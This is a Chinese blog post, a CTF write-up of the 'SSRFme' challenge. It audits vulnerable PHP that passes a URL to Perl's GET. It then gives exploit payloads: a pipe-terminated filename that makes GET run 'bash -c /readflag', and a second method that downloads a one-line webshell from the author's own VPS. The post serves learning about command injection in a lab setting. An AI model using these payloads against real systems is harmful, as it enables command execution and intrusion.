HNCTF2017 SSRFME

已于 2024-02-06 01:22:38 修改
阅读量922 收藏 20
点赞数 10
分类专栏: CTF学习笔记 文章标签: 网络安全
于 2024-02-01 00:24:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NYG694/article/details/135958507
版权

HNCTF2017 SSRFME

今天深度剖析一下SSRFme这道题目
在这里插入图片描述

拿道题目从上往下的代码审计进行分析

第一部分:

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
    }
        echo $_SERVER["REMOTE_ADDR"];

功能:
1.$_SERVER的功能是接受一个参数,这里是在X-FORWARD里面

在首行代码中,explode(‘,’, $_SERVER[‘HTTP_X_FORWARDED_FOR’]) 使用逗号 (,) 作为分隔符将字符串分割成数组。因为这个头部允许包含多个 IP 地址,其中最左边的 IP 地址是最初的客户端 IP。

第二部分:

$sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
echo $sandbox;
@mkdir($sandbox);
@chdir($sandbox);

功能:
1.sandbox变量是由sandbox加上(orange+上文的地址赋值)

举例说明: 赋值127.0.0.1加密后为cfbb870b58817bf7705c0bd826e8dba7。
组合后就是
sandbox/cfbb870b58817bf7705c0bd826e8dba7

2.mkdir创建文件夹
3.chdir更改当前目录到文件夹

第三部分:

 $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
    $info = pathinfo($_GET["filename"]);
    $dir  = str_replace(".", "", basename($info["dirname"]));

功能:
1.$data = shell_exec("GET " . escapeshellarg($_GET["url"]));
这里有一个重点perl脚本GET的使用,可以直接查询目录,和正常指令一样
在这里插入图片描述
2.Pathinfo()函数作用

可以通过以下方式访问 `pathinfo()` 返回的关联数组中的不同信息:
  • $info['dirname']:返回文件所在目录的路径。
  • $info['basename']:返回文件的完整基本名称(包含文件名和扩展名)。
  • $info['extension']:返回文件的扩展名。
  • $info['filename']:返回文件的名称(不包含扩展名)。 ```

3.str_replace的把点换成空格

  @mkdir($dir);
  @chdir($dir);
  @file_put_contents(basename($info["basename"]), $data);
  highlight_file(__FILE__);

在当前目录就是sandbox/cfbb870b58817bf7705c0bd826e8dba7文件夹建立文件名不要拓展名
回到本题,

方法一:perl命令读取

我们可以尝试GET /读取根目录

?url= /&filename=666.txt
访问一下:
/sandbox/fcf2bccafc269c160382150a0166d632/666.txt
在当前目录就建立了以data数据内容的一个个目录
再看到
在这里插入图片描述
可以看到根目录,那怎么读取,先尝试
url=/flag&filename=6667.txt 读取是空白,再看readflag,是乱码二进制数据很明显就是要我们运行,那这里就要用到file配合。

主要的知识点:perl函数看到要打开的文件名中如果以管道符(键盘上那个竖杠|)结尾,就会中断原有打开文件操作,并且把这个文件名当作一个命令来执行,并且将命令的执行结果作为这个文件的内容写入。这个命令的执行权限是当前的登录者。如果你执行这个命令,你会看到perl程序运行的结果。

针对GET命令,使用file:来搭配读取文件

而想执行readflag文件,仅仅是使用file:是不够的,还需要使用Linux下的命令执行:bash -c 首先得满足前面的文件存在,
才会继续到open语句, 所以在执行命令前得保证有相应的同名文件:

 ?url=&filename=bash -c /readflag|

先新建一个名为“bash -c /readflag|”的文件,用于之后的命令执行

?url=file:bash -c /readflag|&filename=aaa

这就拿到fkag了
在这里插入图片描述

方法二:vps写入

get访问自己服务器上的文件写入木马即可之后用一句话木马,但执行要用
cmd=system('bash -c /readflag');
在这里插入图片描述

N1_WEB
关注
专栏目录
[HNCTF 2022 WEEK2]easy_unser - 反序列化(wakeup绕过&目录绕过)
oZuoShen123的博客
10-07 1048
2、起始:body(__construct)、终点:body(__destruct),中间需要绕过__wakeup()1、题目干扰字符太多了,其实简化之后的代码差不多这样。
HNCTF
m0_73725283的博客
05-27 1109
正常·RSA常用的e是65537,那么65537-1=65536,它可能在base家族中能被找到(好明显的提示啊,想不到/(ㄒoㄒ)/~~)奇怪的字符,肯定也是一种加密,再次看到提示2^11=2048,所以是base2048(这谁想得到,摔桌(╯▔皿▔)╯)时间戳,是从1970年1月1日(UTC/GMT的午夜)开始所经过的秒数(不考虑闰秒),用于表示一个时间点。根据上图,有:模p的三阶矩阵群的阶为p(p-1)(p+1)(p^2+p+1)矩阵上的RSA,n是不大的,可以直接分解,主要还是求d的问题。
HNCTF-osint
2401_84488651的博客
06-16 1100
卫星视角发现右上角有块类似建筑地基的图案,和给定的图片十分相似,那么大概率是海口美兰国际机场,黄色灯光处为羊山大道,那么只需找到航班号即可,逐一尝试,发现B224J对应的HU7006为正确答案。对比题目给定的图片,发现符合,确定红框为山西圣天湖景区,且根据飞行的高度可知为降落状态,查询附近机场。结合赛区地点和飞行方向,应该为贵阳,广州,西安之一飞往运城机场,尝试飞常准app查找贵阳到运城航班。此时联想到题目描述“长城杯”,可查看赛区划分。一眼丁真,该河流为黄河,且走势弯曲,直接百度地图搜索黄河沿岸。
HNCTF2022 REVERSE
2301_80048347的博客
06-02 449
不懂python,转成C语言char s[36];int i;s[0]='N';for(i=1;i
2022HNCTF-web
bossDDYY的博客
10-30 3375
应该和http协议有关 想要什么 肯定flag说我们不是admin 看看cookie修改cookie继续修改 x-forwarded-for [Week1]2048 分析 题目描述你能达到20000分吗?应该是要求我们玩到20000分F12查看脚本直接输入在控制台输入 [Week1]easy_html 分析 输入框限制了11位 f12修改html属性 或者直接post参数 [Week1]Interesting_include 分析 题目描述:web手要懂得搜索 应该要借助浏览器一眼伪协议base64解码 [
HNCTF-PWN
A13837377363的博客
05-12 736
直接看危险函数,不能溢出,只能覆盖ebp。后面紧接的又是leave,ret很明显是栈迁移,通过printf打印出ebp,通过偏移计算出栈地址。通过gdb调试,偏移是0x38。
【Web】HNCTF 2022 题解(全)
uuzeray的博客
04-22 1946
过滤了php . log flag :,选择打临时session文件包含。base64解码后读到Rea1web3he11.php源码。简单fuzz一下,ban了这么些,一眼顶针,无列名注入。就是一个wakeup的绕过,然后读文件用伪协议。然后随便输入一串手机号直接拿到flag。就是ssrf往flag.php发请求。连蚁剑,flag在/var目录下。base64解码拿到flag。提示访问./f14g.php。base64解码拿到flag。base64解码拿到flag。一眼顶针,藏flag鉴定为烂。
HNCTF2024-easypwn
sagic的博客
07-18 245
我们可以执行 exec 1>&0,也就是把标准输出重定向到标准输入,因为默认打开一个终端后,0,1,2都指向同一个位置也就是当前终端,所以这条语句相当于重启了标准输出,此时就可以执行命令并且看得到输出了。0是标准输入,1是标准输出,2是标准错误。
HNCTF wp
GSflyy的博客
11-04 1500
打HNCTF的一些收获,以及部分wp
HNCTF 2022 Week1 easyoverflow
2301_79793667的博客
12-19 602
存在危险函数gets,填满数组v4后填充v5,当v5!=0时,自动弹出flag,所以要用变量覆写。、先进行nc连接,发现输入一些东西后会被弹出程序。检查一下附件位数,用相应位数ida打开。首先开启环境,下载附件。
week2day2
02-18
它是互联网的基础,用于构建和设计网页的结构。...在这个阶段,我们可能会涵盖以下几个关键知识点: ...接着是`<html>`元素,它是整个文档的根元素。`<head>`包含元信息,如标题、字符集等,而`<body>`则包含网页的实际...
运行<?php error_reporting(0); highlight_file(__FILE__); include 'flag.php'; $a = $_GET['hnctf']; if($a == "hello"){ echo $flag; }
03-01
这段代码是一个简单的PHP程序,它包含了一个变量 `$a`,通过 GET 请求获取参数 `hnctf` 的值。如果参数的值等于字符串 "hello",则会输出变量 `$flag` 的值。 这段代码存在一些安全问题: 1. `error_reporting(0)` ...
<?php error_reporting(0); highlight_file(__FILE__); include 'flag.php'; $a = $_GET['hnctf']; if($a == "hello"){ echo $flag; }
03-01
它包含了一个变量 `$a`,并通过 `$_GET` 获取用户传入的参数 `hnctf` 的值。如果用户传入的值等于字符串 "hello",则会输出变量 `$flag` 的值。 需要注意的是,这段代码存在一些安全风险。首先,`error_reporting(0...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8549
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
实验室设备管理系统 SSM毕业设计 附带论文.zip
11-14
实验室设备管理系统 SSM毕业设计 附带论文 启动教程:https://www.bilibili.com/video/BV1GK1iYyE2B
PPT高效插件神器推荐-最新发布.zip
最新发布
11-14
PPT高效插件神器推荐-最新发布.zip
数据中心机房基础设计及规划方案.pdf
11-14
数据中心机房是现代信息技术的核心设施,它承载着企业的重要数据和服务,因此,其基础设计与规划至关重要。在制定这样的方案时,需要考虑的因素繁多,包括但不限于以下几点: 1. **容量规划**:必须根据业务需求预测未来几年的数据处理和存储需求,合理规划机房的规模和设备容量。这涉及到服务器的数量、存储设备的容量以及网络带宽的需求等。 2. **电力供应**:数据中心是能源消耗大户,因此电力供应设计是关键。要考虑不间断电源(UPS)、备用发电机的容量,以及高效节能的电力分配系统,确保电力的稳定供应并降低能耗。 3. **冷却系统**:由于设备密集运行,散热问题不容忽视。合理的空调布局和冷却系统设计可以有效控制机房温度,避免设备过热引发故障。 4. **物理安全**:包括防火、防盗、防震、防潮等措施。需要设计防火分区、安装烟雾探测和自动灭火系统,设置访问控制系统,确保只有授权人员能进入。 5. **网络架构**:规划高速、稳定、冗余的网络架构,考虑使用光纤、以太网等技术,构建层次化网络,保证数据传输的高效性和安全性。 6. **运维管理**:设计易于管理和维护的IT基础设施,例如模块化设计便于扩展,集中监控系统可以实时查看设备状态,及时发现并解决问题。 7. **绿色数据中心**:随着环保意识的提升,绿色数据中心成为趋势。采用节能设备,利用自然冷源,以及优化能源管理策略,实现低能耗和低碳排放。 8. **灾难恢复**:考虑备份和恢复策略,建立异地灾备中心,确保在主数据中心发生故障时,业务能够快速恢复。 9. **法规遵从**:需遵循国家和地区的相关法律法规,如信息安全、数据保护和环境保护等,确保数据中心的合法运营。 10. **扩展性**:设计时应考虑到未来的业务发展和技术进步,保证机房有充足的扩展空间和升级能力。 技术创新在数据中心机房基础设计及规划方案中扮演了重要角色。例如,采用虚拟化技术可以提高硬件资源利用率,软件定义网络(SDN)提供更灵活的网络管理,人工智能和机器学习则有助于优化能源管理和故障预测。 总结来说,一个完整且高效的数据中心机房设计及规划方案,不仅需要满足当前的技术需求和业务目标,还需要具备前瞻性和可持续性,以适应快速变化的IT环境和未来可能的技术革新。同时,也要注重经济效益,平衡投资成本与长期运营成本,实现数据中心的高效、安全和绿色运行。
Visio软件全套资源及教程-最新发布.zip
11-14
Visio软件全套资源及教程-最新发布.zip
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值